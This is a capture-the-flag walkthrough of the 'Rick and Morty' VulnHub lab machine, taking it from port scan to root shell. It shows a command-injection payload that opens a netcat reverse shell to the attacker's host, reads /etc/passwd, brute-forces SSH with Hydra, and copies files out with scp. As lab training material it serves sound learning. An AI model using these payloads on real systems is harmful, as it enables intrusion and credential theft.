A new Boot2Root came online on VulnHub and it looked like fun. This one is themed around a cartoon show called “Rick and Morty”.
First order of business for me is to run an Nmap scan. I like to do a full TCP port scan with service enumeration.
root@kali:~# nmap 10.0.1.9 -Pn -p- -sV Starting Nmap 7.25SVN ( https://nmap.org ) at 2017-10-16 13:52 EDT Nmap scan report for 10.0.1.9 Host is up (0.00022s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh? 80/tcp open http Apache httpd 2.4.27 ((Fedora)) 9090/tcp open http Cockpit web service 13337/tcp open unknown 22222/tcp open ssh OpenSSH 7.5 (protocol 2.0) 60000/tcp open unknown
Before hitting the well known ports, I will inspect the interesting ones. Port 9090 is identified within the VM as being the management interface. From there I connected via HTTPS and get the first flag:
FLAG {There is no Zeus, in your face!} – 10 points
Connecting to port 13337 with netcat reveals yet another flag:
root@kali:~# nc 10.0.1.9 13337
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connecting to port 60000 gave me a sort of “fake” shell to play around with. I saw there is a file named FLAG.txt so reading that file gave me the flag.
root@kali:~# nc 10.0.1.9 60000 Welcome to Ricks half baked reverse shell... # ls FLAG.txt # cat FLAG.txt
FLAG{Flip the pickle Morty!} – 10 Points
Running Nmap with scripts (-sC flag) shows that FTP is unauthenticated. I connected to it with within my web browser.
ftp://10.0.1.9
There was a flag file inside to download:
FLAG{Whoa this is unexpected} – 10 Points
Moving on now to the main web app, I reviewed the source code, but there isn’t much to look at. Running any spider application or just going to the common “robots.txt” file in the web root reveals this:
They're Robots Morty! It's ok to shoot them! They're just Robots! /cgi-bin/root_shell.cgi /cgi-bin/tracertool.cgi /cgi-bin/*
Root_shell.cgi is a troll, but tracertool.cgi is pretty interesting. It is a web application that performs traceroute on a given IP. As an obvious canidate for command injection, I inserted a semi-colon to run a seperate command. I used netcat to send myself a reverse shell:
127.0.0.1; nc -e /bin/sh 10.0.1.15 4444
After getting a shell I started poking around. Looking in the html directory I saw a passwords folder.
cd .. cd html ls -lah total 536K drwxr-xr-x. 3 root root 76 Aug 22 03:36 . drwxr-xr-x. 4 root root 33 Aug 22 02:27 .. -rw-r--r--. 1 root root 326 Aug 22 01:58 index.html -rw-r--r--. 1 root root 528K Aug 22 01:50 morty.png drwxr-xr-x. 2 root root 44 Aug 23 19:51 passwords -rw-r--r--. 1 root root 126 Aug 22 03:36 robots.txt
Hitting this in the web browser to reveals the FLAG.txt.
FLAG{Yeah d- just don’t do it.} – 10 Points
Also worth note is the passwords.html file. Looking at it doesn’t tell much, but if when I viewed the source, I saw a password hidden in the HTML comments.
<!DOCTYPE html> <html> <head> <title>Morty's Website</title> <body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need. </body> <!--Password: winter--> </head> </html>
At this point I came to find that the “cat” command was aliased to some command that just printed a picture of a cat. To read files still, I just used grep command that would pretty much match on anything:
grep '[a-zA-Z0-9]' /etc/passwd
Running this command I could see all the users on the system.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:997:996:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin chrony:x:995:993::/var/lib/chrony:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash Morty:x:1001:1001::/home/Morty:/bin/bash Summer:x:1002:1002::/home/Summer:/bin/bash apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
Knowing the password I found was “winter”, I figured this belonged to Summer. Port 22222 was running OpenSSH so I used that to connect with the “Summer” user account.
root@kali:~# ssh Summer@10.0.1.9 -p 22222
Once logged in as Summer, I saw another FLAG.txt waiting for me.
[Summer@localhost ~]$ ls -lah total 20K drwx------. 2 Summer Summer 99 Sep 15 11:49 . drwxr-xr-x. 5 root root 52 Aug 18 18:20 .. -rw-------. 1 Summer Summer 1 Sep 15 11:51 .bash_history -rw-r--r--. 1 Summer Summer 18 May 30 14:53 .bash_logout -rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile -rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc -rw-rw-r--. 1 Summer Summer 48 Aug 22 02:46 FLAG.txt [Summer@localhost ~]$ grep '[a-zA-Z0-9]' FLAG.txt
FLAG{Get off the high road Summer!} – 10 Points
Summer also had read access on some other user’s home directories.
[Summer@localhost home]$ ls -lah total 0 drwxr-xr-x. 5 root root 52 Aug 18 18:20 . dr-xr-xr-x. 17 root root 236 Aug 18 19:16 .. drwxr-xr-x. 2 Morty Morty 131 Sep 15 11:49 Morty drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 RickSanchez drwx------. 2 Summer Summer 99 Sep 15 11:49 Summer
Morty had several interesting files in his home directory. I exfiled them off with SCP.
root@kali:~# scp -P 22222 summer@10.0.1.9:/home/Morty/Safe_Password.jpg .
Safe_Password.jpg was an image file, but viewing the EXIF data or simply running strings on the file shows that a password is contained inside.
root@kali:~# strings Safe_Password.jpg JFIF Exif 8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
I also pulled down the journal.txt.zip file.
root@kali:~# scp -P 22222 Summer@10.0.1.9:/home/Morty/journal.txt.zip .
Unzipping the file and supplying the password gave me the journal.txt file:
root@kali:~# unzip journal.txt.zip Archive: journal.txt.zip [journal.txt.zip] journal.txt password: inflating: journal.txt
Reading this file gave me the next flag, and a password.
root@kali:~# cat journal.txt Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe? Anyway. Here it is:
FLAG: {131333} – 20 Points
When looking in Rick’s home folder, I could see his safe.
[Summer@localhost RICKS_SAFE]$ ls -lah total 12K drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21 09:50 . drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .. -rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe
Summer does not have execute permissions on the “safe” file and does not own it, but she does have read permissions. I copied it to gain control.
[Summer@localhost RICKS_SAFE]$ cp safe /tmp/safe
Running the binary and supplying the password file gave me the next flag.
Summer@localhost tmp]$ ./safe 131333
FLAG{And Awwwaaaaayyyy we Go!} – 20 Points
Ricks password hints: (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.) Follow these clues, in order 1 uppercase character 1 digit One of the words in my old bands name.� @
I was also given a password hint for Rick’s password. I don’t watch the TV show, but a quick Google search found that the band name was “The Flesh Curtains”.
I worte a simple python script to create all the different possible passwords given the constraints:
from string import ascii_uppercase
for c in ascii_uppercase:
for x in range(0, 10):
print str(c) + str(x) + "Flesh"
print str(c) + str(x) + "Curtains"
After running this script an saving the output to a file, I used THC Hydra to brute force SSH.
hydra -s 22222 -v -V -l RickSanchez -P [PASSWORD FILE] -t 16 10.0.1.9 ssh [22222][ssh] host: 10.0.1.9 login: RickSanchez password: P7Curtains
Once I found the valid password, I connected to Rick’s account.
root@kali:~# ssh RickSanchez@10.0.1.9 -p 22222
I ran sudo -l to enumerate his permissions:
[RickSanchez@localhost ~]$ sudo -l [sudo] password for RickSanchez: Matching Defaults entries for RickSanchez on localhost: !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User RickSanchez may run the following commands on localhost: (ALL) ALL
Rick had sudo permissions for ALL commands, so I just popped into an interactive root shell:
[RickSanchez@localhost ~]$ sudo -i
In the /root/ directory, there was another FLAG.txt.
[root@localhost ~]# grep '[a-zA-Z0-9]' FLAG.txt
FLAG: {Ionic Defibrillator} – 30 points
At this point I was root and had collected all 130 points.
